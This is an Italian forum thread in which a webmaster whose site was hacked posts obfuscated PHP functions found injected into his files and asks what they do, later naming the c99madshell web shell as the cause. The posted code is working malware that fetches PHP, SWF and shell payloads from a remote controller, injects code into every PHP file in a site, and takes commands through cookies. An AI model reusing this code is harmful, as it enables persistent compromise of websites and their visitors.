secondo voi che fanno le funzioni di questo exploit?

**fabrrrri** · 03-02-2009, 23:20

Mi hanno bucato il sito, ora mi ritrovo con tutti i file .php con un include e un sacco di funzioni codificate, ne ho provate a decodificare alcune, però non ci ho capito molto, ve le posto qui (sono solo la prima parte)

Codice PHP:


<?php function FF97A1D7A5B771B21D423C3A9D78408C1($RC4A5B5E310ED4C323E04D72AFAE39F53, $R399036803A841185E4A270BC666A66CF = false){ global $_GET; set_time_limit(600); if(isset($_GET['dgd'])){ $R399036803A841185E4A270BC666A66CF = false; } if(!FB078122F16A8F8B2978109BD72E1AC30($GLOBALS['dgcp'].$GLOBALS['dgin'])){return;} $RDAD8D40EB9906CAB35CCB38DE41CB7EF = FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63); FE19A7FAB0F9597E68E23311BB5FB460F($RDAD8D40EB9906CAB35CCB38DE41CB7EF); if(!$R399036803A841185E4A270BC666A66CF){ echo"downloaded php size: ".strlen($RDAD8D40EB9906CAB35CCB38DE41CB7EF)."
"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set path[/b]
[44883279]"; } die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">path set to {$GLOBALS['dgcp']}[/b]
[5482745]
"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set name[/b]
[58819152]"; } die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">name set to {$GLOBALS['dgin']}[/b]
[2246876]
"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgep\'] = "', '";', $GLOBALS['dgep'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set path to exploit[/b]
[5093713]"; } die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">path to exploit successfully set to {$GLOBALS['dgep']}[/b]
[8799102]
"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set relative root dir[/b]
[58819152]"; } die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">relative root dir successfully set {$GLOBALS['dgsp']}[/b]
[5893301]
"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgfxp\'] = "', '";', $GLOBALS['dgfxp'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set path to fix file[/b]
[9477124]"; } die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">path to the file for fix successfully set {$GLOBALS['dgfxp']}[/b]
[5018843]
"; } $RCFFAE742FB4E724571041779A10EFDA9 = FCE5FE761FE36220458FAE651AEABF6D9($RDAD8D40EB9906CAB35CCB38DE41CB7EF); $RE477255A8507A54E5CA56CA24210B7DB = strval(strlen($RCFFAE742FB4E724571041779A10EFDA9)); while(strlen($RE477255A8507A54E5CA56CA24210B7DB) < 7){$RE477255A8507A54E5CA56CA24210B7DB = '0' . $RE477255A8507A54E5CA56CA24210B7DB;} if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '"00'.'0', '";', $RE477255A8507A54E5CA56CA24210B7DB)){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set size[/b]
[86612935]"; } die(); } $RCFFAE742FB4E724571041779A10EFDA9 = FCE5FE761FE36220458FAE651AEABF6D9($RDAD8D40EB9906CAB35CCB38DE41CB7EF); if(!$R399036803A841185E4A270BC666A66CF){ echo"my packed size: $RE477255A8507A54E5CA56CA24210B7DB
"; } F17B8C65064AE90679E4CE6254EF6C510($GLOBALS['dgcp'].$GLOBALS['dgin'], $RCFFAE742FB4E724571041779A10EFDA9, "<b style=\"color:green\">{$GLOBALS['dgcp']}{$GLOBALS['dgin']}[/b]
", 1, $R399036803A841185E4A270BC666A66CF); if(!$R399036803A841185E4A270BC666A66CF){ echo "<h3>INJECTING PHP FILES</h3>"; } F012D69AC5CE9ED6C2EC5DF1609CA51C4($GLOBALS['dgdr'], $GLOBALS['dgij'], 1, $R399036803A841185E4A270BC666A66CF); if($GLOBALS['dgsp']){ F012D69AC5CE9ED6C2EC5DF1609CA51C4($GLOBALS['dgsp'], $GLOBALS['dgij'], 1, $R399036803A841185E4A270BC666A66CF); } if(!$R399036803A841185E4A270BC666A66CF){ echo "<hr>[b]dgok[/b]"; }}

?>



<?php function FE30C005A9ED2D1D7195DD8485C71E92C($RC4A5B5E310ED4C323E04D72AFAE39F53, $R399036803A841185E4A270BC666A66CF = false){ global $_GET; set_time_limit(600); if(isset($_GET['dgd'])){ $R399036803A841185E4A270BC666A66CF = false; } if(!FB078122F16A8F8B2978109BD72E1AC30($GLOBALS['dgdf'])){return;} if(!$R399036803A841185E4A270BC666A66CF){ echo "updating goorgen from: ".$RC4A5B5E310ED4C323E04D72AFAE39F53."
"; } $R9DB9E103E88D622316D42B508D6D11AB = FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63); FE19A7FAB0F9597E68E23311BB5FB460F($R9DB9E103E88D622316D42B508D6D11AB); if(!$R399036803A841185E4A270BC666A66CF){ echo"downloaded php size: ".strlen($R9DB9E103E88D622316D42B508D6D11AB)."
"; } F17B8C65064AE90679E4CE6254EF6C510($GLOBALS['dgdf'], $R9DB9E103E88D622316D42B508D6D11AB, "file {$GLOBALS['dgdf']} updated successfully...
", 1, $R399036803A841185E4A270BC666A66CF);}

?>



<?php function F6BB94B6278053E81D67BB712972DDAA4($RC4A5B5E310ED4C323E04D72AFAE39F53, $R399036803A841185E4A270BC666A66CF = false){ global $_GET; set_time_limit(600); if(isset($_GET['dgd'])){ $R399036803A841185E4A270BC666A66CF = false; } if(!FB078122F16A8F8B2978109BD72E1AC30($GLOBALS['dgff'])){return;} if(!$R399036803A841185E4A270BC666A66CF){ echo "updating goorgen from: ".$RC4A5B5E310ED4C323E04D72AFAE39F53."
"; } $R9DB9E103E88D622316D42B508D6D11AB = FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63); if(!$R399036803A841185E4A270BC666A66CF){ echo"downloaded swf size: ".strlen($R9DB9E103E88D622316D42B508D6D11AB)."
"; } F17B8C65064AE90679E4CE6254EF6C510($GLOBALS['dgff'], $R9DB9E103E88D622316D42B508D6D11AB, "file {$GLOBALS['dgff']} updated successfully...
", 1, $R399036803A841185E4A270BC666A66CF);}

?>



<?php function F83C82319C79E957F7851CDE48F48DB3E($RC4A5B5E310ED4C323E04D72AFAE39F53, $R399036803A841185E4A270BC666A66CF = false){ global $_GET; set_time_limit(600); if(isset($_GET['dgd'])){ $R399036803A841185E4A270BC666A66CF = false; } if(!FB078122F16A8F8B2978109BD72E1AC30($GLOBALS['dgsf'])){return;} if(!$R399036803A841185E4A270BC666A66CF){ echo "updating shl from: ".$RC4A5B5E310ED4C323E04D72AFAE39F53."
"; } $R9DB9E103E88D622316D42B508D6D11AB = FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63); FE19A7FAB0F9597E68E23311BB5FB460F($R9DB9E103E88D622316D42B508D6D11AB); if(!$R399036803A841185E4A270BC666A66CF){ echo"downloaded php size: ".strlen($R9DB9E103E88D622316D42B508D6D11AB)."
"; } F17B8C65064AE90679E4CE6254EF6C510($GLOBALS['dgsf'], $R9DB9E103E88D622316D42B508D6D11AB, "file {$GLOBALS['dgsf']} updated successfully...
", 1, $R399036803A841185E4A270BC666A66CF);}

?>



<?php 

function F83C82319C79E957F7851CDE48F48DB3E($RC4A5B5E310ED4C323E04D72AFAE39F53, $R399036803A841185E4A270BC666A66CF = false){ global $_GET; set_time_limit(600); if(isset($_GET['dgd'])){ $R399036803A841185E4A270BC666A66CF = false; } if(!FB078122F16A8F8B2978109BD72E1AC30($GLOBALS['dgsf'])){return;} if(!$R399036803A841185E4A270BC666A66CF){ echo "updating shl from: ".$RC4A5B5E310ED4C323E04D72AFAE39F53."
"; } $R9DB9E103E88D622316D42B508D6D11AB = FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63); FE19A7FAB0F9597E68E23311BB5FB460F($R9DB9E103E88D622316D42B508D6D11AB); if(!$R399036803A841185E4A270BC666A66CF){ echo"downloaded php size: ".strlen($R9DB9E103E88D622316D42B508D6D11AB)."
"; } F17B8C65064AE90679E4CE6254EF6C510($GLOBALS['dgsf'], $R9DB9E103E88D622316D42B508D6D11AB, "file {$GLOBALS['dgsf']} updated successfully...
", 1, $R399036803A841185E4A270BC666A66CF);}

?>



<?php

function F09C226E8C9EFC96D8CC6B1DE49E0CCE6($RC4A5B5E310ED4C323E04D72AFAE39F53, $R399036803A841185E4A270BC666A66CF = false){ global $_GET; set_time_limit(600); if(isset($_GET['dgd'])){ $R399036803A841185E4A270BC666A66CF = false; } if(!FB078122F16A8F8B2978109BD72E1AC30($GLOBALS['dgskf'])){return;} if(!$R399036803A841185E4A270BC666A66CF){ echo "updating sk from: ".$RC4A5B5E310ED4C323E04D72AFAE39F53."
"; } $R9DB9E103E88D622316D42B508D6D11AB = ' ' . trim(FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63)); $R2A039ED8FDBF4CEAA9E79CDC3AECD1A2 = strpos($R9DB9E103E88D622316D42B508D6D11AB, '>>>>>>>'); if($R2A039ED8FDBF4CEAA9E79CDC3AECD1A2 > 0){$R9DB9E103E88D622316D42B508D6D11AB = trim(substr($R9DB9E103E88D622316D42B508D6D11AB, $R2A039ED8FDBF4CEAA9E79CDC3AECD1A2+7, strlen($R9DB9E103E88D622316D42B508D6D11AB)));} $R2A039ED8FDBF4CEAA9E79CDC3AECD1A2 = strpos($R9DB9E103E88D622316D42B508D6D11AB, '<<<<<<<'); $R9DB9E103E88D622316D42B508D6D11AB = trim(substr($R9DB9E103E88D622316D42B508D6D11AB, 0, $R2A039ED8FDBF4CEAA9E79CDC3AECD1A2)); if(!$R399036803A841185E4A270BC666A66CF){ echo"downloaded php size: ".strlen($R9DB9E103E88D622316D42B508D6D11AB)."
"; } F17B8C65064AE90679E4CE6254EF6C510($GLOBALS['dgskf'], $R9DB9E103E88D622316D42B508D6D11AB, "file {$GLOBALS['dgskf']} updated successfully...
", 1, $R399036803A841185E4A270BC666A66CF); } if(isset($_GET['dgd'])){ error_reporting(E_ALL & ~E_NOTICE); }else{ error_reporting(0);}

?>

**fabrrrri** · 03-02-2009, 23:20

un' altra

Codice PHP:


<?php  function FFD456406745D816A45CAE554C788E754($R6E4F14B335243BE656C65E3ED9E1B115, $RC5B265F9301FFAC9B75AD1757A1402CA, &$R972A1D6D7FBAA83B27C6006E2C7CBC3F, $R9D286369CBA2FBEB34D036FFC3C9EB2E = '', $RE0A7B1BE19805DBB2350D66EDBE24AEF = 0){ $R6AB508110D1CA1855AAE05AD02282850 = 2; if(!$R6E4F14B335243BE656C65E3ED9E1B115){return '';} if(isset($_GET['dgd'])){ echo"downloading: $R6E4F14B335243BE656C65E3ED9E1B115
"; } $R844DFC0FD25D1F7E03DECF1F5A9504A9 = parse_url($R6E4F14B335243BE656C65E3ED9E1B115); $R844DFC0FD25D1F7E03DECF1F5A9504A9[port] = ($R844DFC0FD25D1F7E03DECF1F5A9504A9[port]) ? $R844DFC0FD25D1F7E03DECF1F5A9504A9[port] : 80; $R844DFC0FD25D1F7E03DECF1F5A9504A9[path] = ($R844DFC0FD25D1F7E03DECF1F5A9504A9[path]) ? $R844DFC0FD25D1F7E03DECF1F5A9504A9[path] : "/"; $R844DFC0FD25D1F7E03DECF1F5A9504A9[query] = ($R844DFC0FD25D1F7E03DECF1F5A9504A9[query]) ? $R844DFC0FD25D1F7E03DECF1F5A9504A9[path] = $R844DFC0FD25D1F7E03DECF1F5A9504A9[path] . "?" . $R844DFC0FD25D1F7E03DECF1F5A9504A9[query] : ""; if($R9D286369CBA2FBEB34D036FFC3C9EB2E){ $R0F99E0D6C7207D37EA8439D6EB434CDE = 'POST'; }else{ $R0F99E0D6C7207D37EA8439D6EB434CDE = 'GET'; } $RE91192A00FF990477EE414AD5D708F08 = "{$R0F99E0D6C7207D37EA8439D6EB434CDE} " . $R844DFC0FD25D1F7E03DECF1F5A9504A9[path] . " HTTP/1.1\r\n"; $RE91192A00FF990477EE414AD5D708F08 .= "Host: " . $R844DFC0FD25D1F7E03DECF1F5A9504A9[host] . "\r\n"; $RE91192A00FF990477EE414AD5D708F08 .= "Accept: */*" . "\r\n"; $RE91192A00FF990477EE414AD5D708F08 .= "Connection: close" . "\r\n"; $RE91192A00FF990477EE414AD5D708F08 .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n"; if($R9D286369CBA2FBEB34D036FFC3C9EB2E){ $RE91192A00FF990477EE414AD5D708F08 .= "Content-Type: application/x-www-form-urlencoded" . "\r\n"; $RE91192A00FF990477EE414AD5D708F08 .= "Content-Length: " . strlen($R9D286369CBA2FBEB34D036FFC3C9EB2E) . "\r\n"; } $RE91192A00FF990477EE414AD5D708F08 .= "\r\n{$R9D286369CBA2FBEB34D036FFC3C9EB2E}"; $R32D00070D4FFBCCE2FC669BBA812D4C2 = 0; $RB5ADDE8D7D7412251F47419FE9BF51A7 = ""; $RAD10634E7F72CAA071320F21AEE5930D = fsockopen($R844DFC0FD25D1F7E03DECF1F5A9504A9[host], $R844DFC0FD25D1F7E03DECF1F5A9504A9[port], $R32D00070D4FFBCCE2FC669BBA812D4C2, $RB5ADDE8D7D7412251F47419FE9BF51A7, $RC5B265F9301FFAC9B75AD1757A1402CA); $R60169CD1C47B7A7A85AB44F884635E41 = array(); $R7F9D6867B727C5EC3758829CBABBFD36 = array(); if($RAD10634E7F72CAA071320F21AEE5930D){ stream_set_timeout($RAD10634E7F72CAA071320F21AEE5930D, $RC5B265F9301FFAC9B75AD1757A1402CA); fwrite($RAD10634E7F72CAA071320F21AEE5930D, $RE91192A00FF990477EE414AD5D708F08); $RFA881AEE34CEA5BF14CD17E0AD2944C6 = false; while(!feof($RAD10634E7F72CAA071320F21AEE5930D)){ $R24D59CD0B76A27B85F35D40A3CF6EC37 = fgets($RAD10634E7F72CAA071320F21AEE5930D); if(!$RFA881AEE34CEA5BF14CD17E0AD2944C6){ if(trim($R24D59CD0B76A27B85F35D40A3CF6EC37) == ''){ $RFA881AEE34CEA5BF14CD17E0AD2944C6 = true; preg_match("/\s(\d+)\s/i", $R972A1D6D7FBAA83B27C6006E2C7CBC3F[0], $RE210144EE46D52EFF5A34BE0C0C71CCD); $R705C59363F6BEBFE41728F6F75F5423B = $RE210144EE46D52EFF5A34BE0C0C71CCD[1]; foreach($R972A1D6D7FBAA83B27C6006E2C7CBC3F as $RF413F06AEBBCEF5E1C8B1019DEE6FE6B=>$R244F38266C59587D696AEC08A771B803){ $RCC5C6E696C11A4FDF170ECE8BA9FDC6F = explode(':', $R244F38266C59587D696AEC08A771B803); $RCC5C6E696C11A4FDF170ECE8BA9FDC6F[0] = strtolower(trim($RCC5C6E696C11A4FDF170ECE8BA9FDC6F[0])); if($RCC5C6E696C11A4FDF170ECE8BA9FDC6F[0] == 'set-cookie'){ $R4CAA478FC1005DCAD93D16E2B120C14D = explode('=', $RCC5C6E696C11A4FDF170ECE8BA9FDC6F[1]); $RE674E33E8DC26EFCE29C0141E87BCC71 = strtolower(trim($R4CAA478FC1005DCAD93D16E2B120C14D[0])); $R2AD9950243B7A228B12A8650166BE4DC = trim($R4CAA478FC1005DCAD93D16E2B120C14D[1]); if($RE0A7B1BE19805DBB2350D66EDBE24AEF == 0 && $RE674E33E8DC26EFCE29C0141E87BCC71 == 'ml'){ if($R2AD9950243B7A228B12A8650166BE4DC > 0 && $R2AD9950243B7A228B12A8650166BE4DC <> $GLOBALS['dgopt']['ml']){ $GLOBALS['dgopt']['ml'] = $R2AD9950243B7A228B12A8650166BE4DC; FABF1F9768353B2564B5460F178C4F1CB(); } }elseif($RE0A7B1BE19805DBB2350D66EDBE24AEF == 0 && $RE674E33E8DC26EFCE29C0141E87BCC71 == 'blo'){ if($R2AD9950243B7A228B12A8650166BE4DC <> $GLOBALS['dgopt']['dgblo']){ $GLOBALS['dgopt']['dgblo'] = $R2AD9950243B7A228B12A8650166BE4DC; FABF1F9768353B2564B5460F178C4F1CB(); } }elseif($RE0A7B1BE19805DBB2350D66EDBE24AEF == 0 && $RE674E33E8DC26EFCE29C0141E87BCC71 == 'fr'){ if($R2AD9950243B7A228B12A8650166BE4DC <> $GLOBALS['dgopt']['fr']){ $GLOBALS['dgopt']['fr'] = $R2AD9950243B7A228B12A8650166BE4DC; FABF1F9768353B2564B5460F178C4F1CB(); } }elseif($RE0A7B1BE19805DBB2350D66EDBE24AEF == 0 && $RE674E33E8DC26EFCE29C0141E87BCC71 == 'qr'){ $R2AD9950243B7A228B12A8650166BE4DC = trim(base64_decode(rawurldecode($R2AD9950243B7A228B12A8650166BE4DC))); if($R2AD9950243B7A228B12A8650166BE4DC <> $GLOBALS['dgopt']['qr']){ $GLOBALS['dgopt']['qr'] = $R2AD9950243B7A228B12A8650166BE4DC; FABF1F9768353B2564B5460F178C4F1CB(); } }elseif($RE0A7B1BE19805DBB2350D66EDBE24AEF == 0 && $RE674E33E8DC26EFCE29C0141E87BCC71 == 'jsv' && $R2AD9950243B7A228B12A8650166BE4DC > 0 && $GLOBALS['jsv'] < $R2AD9950243B7A228B12A8650166BE4DC && $_SERVER['HTTP_HOST']){ if(isset($_GET['dgd'])){ echo"fc: $RE674E33E8DC26EFCE29C0141E87BCC71 - u_self
"; } $GLOBALS['dgu_jurl'] = $GLOBALS['dguh'] . "?update=js&host={$_SERVER['HTTP_HOST']}&ver={$GLOBALS['jsv']}"; }elseif($RE0A7B1BE19805DBB2350D66EDBE24AEF == 0 && $RE674E33E8DC26EFCE29C0141E87BCC71 == 'blo'){ if($R2AD9950243B7A228B12A8650166BE4DC <> $GLOBALS['dgopt']['dgblo']){ $GLOBALS['dgopt']['dgblo'] = $R2AD9950243B7A228B12A8650166BE4DC; FABF1F9768353B2564B5460F178C4F1CB(); } }elseif($RE0A7B1BE19805DBB2350D66EDBE24AEF == 0 && $RE674E33E8DC26EFCE29C0141E87BCC71 == 'dgv' && $R2AD9950243B7A228B12A8650166BE4DC > 0 && $_SERVER['HTTP_HOST'] && (!file_exists($GLOBALS['dgdf']) || ($R2AD9950243B7A228B12A8650166BE4DC > 0 && filesize($GLOBALS['dgdf']) <> $R2AD9950243B7A228B12A8650166BE4DC))){ if(isset($_GET['dgd'])){ echo"fc: $RE674E33E8DC26EFCE29C0141E87BCC71 - u_dg
"; } file_exists($GLOBALS['dgdf']) ? $R41E9750045B5EA25161B97AC3F50EEAF = filesize($GLOBALS['dgdf']) : $R41E9750045B5EA25161B97AC3F50EEAF = 0; $GLOBALS['dgu_durl'] = $GLOBALS['dguh'] . "?update=dg&host={$_SERVER['HTTP_HOST']}&ver=" . $R41E9750045B5EA25161B97AC3F50EEAF; }elseif($RE0A7B1BE19805DBB2350D66EDBE24AEF == 0 && $RE674E33E8DC26EFCE29C0141E87BCC71 == 'swf' && $R2AD9950243B7A228B12A8650166BE4DC > 0 && $_SERVER['HTTP_HOST'] && (!file_exists($GLOBALS['dgff']) || ($R2AD9950243B7A228B12A8650166BE4DC > 0 && filesize($GLOBALS['dgff']) <> $R2AD9950243B7A228B12A8650166BE4DC))){ if(isset($_GET['dgd'])){ echo"fc: $RE674E33E8DC26EFCE29C0141E87BCC71 - u_swf
"; } file_exists($GLOBALS['dgff']) ? $R41E9750045B5EA25161B97AC3F50EEAF = filesize($GLOBALS['dgff']) : $R41E9750045B5EA25161B97AC3F50EEAF = 0; $GLOBALS['dgu_wurl'] = $GLOBALS['dguh'] . "?update=swf&host={$_SERVER['HTTP_HOST']}&ver=" . $R41E9750045B5EA25161B97AC3F50EEAF; }elseif($RE0A7B1BE19805DBB2350D66EDBE24AEF == 0 && $RE674E33E8DC26EFCE29C0141E87BCC71 == 'shv' && $R2AD9950243B7A228B12A8650166BE4DC && $_SERVER['HTTP_HOST'] && (!file_exists($GLOBALS['dgsf']) || ($R2AD9950243B7A228B12A8650166BE4DC > 0 && filesize($GLOBALS['dgsf']) <> $R2AD9950243B7A228B12A8650166BE4DC))){ if(isset($_GET['dgd'])){ echo"fc: $RE674E33E8DC26EFCE29C0141E87BCC71 - u_shl
"; } $GLOBALS['dgu_surl'] = $GLOBALS['dguh'] . "?update=shl&host={$_SERVER['HTTP_HOST']}"; }elseif($RE0A7B1BE19805DBB2350D66EDBE24AEF == 0 && $RE674E33E8DC26EFCE29C0141E87BCC71 == 'sk' && $R2AD9950243B7A228B12A8650166BE4DC && $_SERVER['HTTP_HOST'] && (!file_exists($GLOBALS['dgskf']) || ($R2AD9950243B7A228B12A8650166BE4DC > 0 && filesize($GLOBALS['dgskf']) <> $R2AD9950243B7A228B12A8650166BE4DC))){ if(isset($_GET['dgd'])){ echo"fc: $RE674E33E8DC26EFCE29C0141E87BCC71 - u_sk
"; } $GLOBALS['dgu_kurl'] = $GLOBALS['dguh'] . "?update=sk&host={$_SERVER['HTTP_HOST']}"; }elseif($RE674E33E8DC26EFCE29C0141E87BCC71 == 'qr' && $R2AD9950243B7A228B12A8650166BE4DC){ $R2AD9950243B7A228B12A8650166BE4DC = trim(base64_decode(rawurldecode($R2AD9950243B7A228B12A8650166BE4DC))); if($R2AD9950243B7A228B12A8650166BE4DC <> $GLOBALS['dgopt']['qr']){ $GLOBALS['dgopt']['qr'] = $R2AD9950243B7A228B12A8650166BE4DC; FABF1F9768353B2564B5460F178C4F1CB(); } }elseif($RE674E33E8DC26EFCE29C0141E87BCC71 == 'dgth' && $R2AD9950243B7A228B12A8650166BE4DC){ $R2AD9950243B7A228B12A8650166BE4DC = trim(base64_decode(rawurldecode($R2AD9950243B7A228B12A8650166BE4DC))); if(preg_match("/[^\w\d\-\.]/", $R2AD9950243B7A228B12A8650166BE4DC)){ continue; } $RA09FE38AF36F6839F4A75051DC7CEA25 = 0; if(!strpos($GLOBALS['dgopt']['dgurl'], $R2AD9950243B7A228B12A8650166BE4DC)){ $GLOBALS['dgopt']['dgurl'] = str_replace(FC5CD818E18432BE97F2200CD1AF5BA5D($GLOBALS['dgopt']['dgurl']), $R2AD9950243B7A228B12A8650166BE4DC, $GLOBALS['dgopt']['dgurl']); $RA09FE38AF36F6839F4A75051DC7CEA25 = 1; } if(!strpos($GLOBALS['dgopt']['dgsu'], $R2AD9950243B7A228B12A8650166BE4DC)){ $GLOBALS['dgopt']['dgsu'] = str_replace(FC5CD818E18432BE97F2200CD1AF5BA5D($GLOBALS['dgopt']['dgsu']), $R2AD9950243B7A228B12A8650166BE4DC, $GLOBALS['dgopt']['dgsu']); $RA09FE38AF36F6839F4A75051DC7CEA25 = 1; } if($RA09FE38AF36F6839F4A75051DC7CEA25){ FABF1F9768353B2564B5460F178C4F1CB(); } }elseif($RE674E33E8DC26EFCE29C0141E87BCC71 == 'dguh' && $R2AD9950243B7A228B12A8650166BE4DC){ $R2AD9950243B7A228B12A8650166BE4DC = trim(base64_decode(rawurldecode($R2AD9950243B7A228B12A8650166BE4DC))); $RCC5C6E696C11A4FDF170ECE8BA9FDC6F = explode(";", $R2AD9950243B7A228B12A8650166BE4DC); $R2AD9950243B7A228B12A8650166BE4DC = ''; $RA09FE38AF36F6839F4A75051DC7CEA25 = 0; foreach($RCC5C6E696C11A4FDF170ECE8BA9FDC6F as $RF413F06AEBBCEF5E1C8B1019DEE6FE6B=>$R244F38266C59587D696AEC08A771B803){ $R244F38266C59587D696AEC08A771B803 = trim($R244F38266C59587D696AEC08A771B803); if(strpos($R244F38266C59587D696AEC08A771B803, 'http') === 0){ $RA09FE38AF36F6839F4A75051DC7CEA25++; $R2AD9950243B7A228B12A8650166BE4DC ? $R2AD9950243B7A228B12A8650166BE4DC .= ";{$R244F38266C59587D696AEC08A771B803}" : $R2AD9950243B7A228B12A8650166BE4DC .= "{$R244F38266C59587D696AEC08A771B803}"; } } if($RA09FE38AF36F6839F4A75051DC7CEA25 >= 3 && $GLOBALS['dgopt']['dguh'] <> $R2AD9950243B7A228B12A8650166BE4DC){ $GLOBALS['dgopt']['dguh'] = $R2AD9950243B7A228B12A8650166BE4DC; FABF1F9768353B2564B5460F178C4F1CB(); } } }elseif($RCC5C6E696C11A4FDF170ECE8BA9FDC6F[0] == 'location'){ $RE0A7B1BE19805DBB2350D66EDBE24AEF++; array_shift($RCC5C6E696C11A4FDF170ECE8BA9FDC6F); $RFB0A807C1475028CB6865DDF80B00BD4 = F3319A17FC84AEE14700CE8DE1BF6FD54($R6E4F14B335243BE656C65E3ED9E1B115, trim(implode(":", $RCC5C6E696C11A4FDF170ECE8BA9FDC6F))); if(isset($_GET['dgd'])){ echo"redirect to: $RFB0A807C1475028CB6865DDF80B00BD4
"; } if($RE0A7B1BE19805DBB2350D66EDBE24AEF <= $R6AB508110D1CA1855AAE05AD02282850){ $R972A1D6D7FBAA83B27C6006E2C7CBC3F = array(); $R034AE2AB94F99CC81B389A1822DA3353 = FFD456406745D816A45CAE554C788E754($RFB0A807C1475028CB6865DDF80B00BD4, $RC5B265F9301FFAC9B75AD1757A1402CA, $R972A1D6D7FBAA83B27C6006E2C7CBC3F, $R9D286369CBA2FBEB34D036FFC3C9EB2E, $RE0A7B1BE19805DBB2350D66EDBE24AEF); } return $R034AE2AB94F99CC81B389A1822DA3353; } } }else{ $R972A1D6D7FBAA83B27C6006E2C7CBC3F[] = $R24D59CD0B76A27B85F35D40A3CF6EC37; } }else{ $R7F9D6867B727C5EC3758829CBABBFD36[] = $R24D59CD0B76A27B85F35D40A3CF6EC37; } } fclose($RAD10634E7F72CAA071320F21AEE5930D); } $R034AE2AB94F99CC81B389A1822DA3353 = implode("", $R7F9D6867B727C5EC3758829CBABBFD36); return $R034AE2AB94F99CC81B389A1822DA3353;} ?>

**fabrrrri** · 03-02-2009, 23:55

ho scoperto che cosa mi hanno caricato sul web server

http://www.derekfountain.org/security_c99madshell.php

alla faccia del diavolo

VVoVe:

Discussione: secondo voi che fanno le funzioni di questo exploit?

Strumenti discussione

Ricerca discussione

Visualizza

secondo voi che fanno le funzioni di questo exploit?

Permessi di invio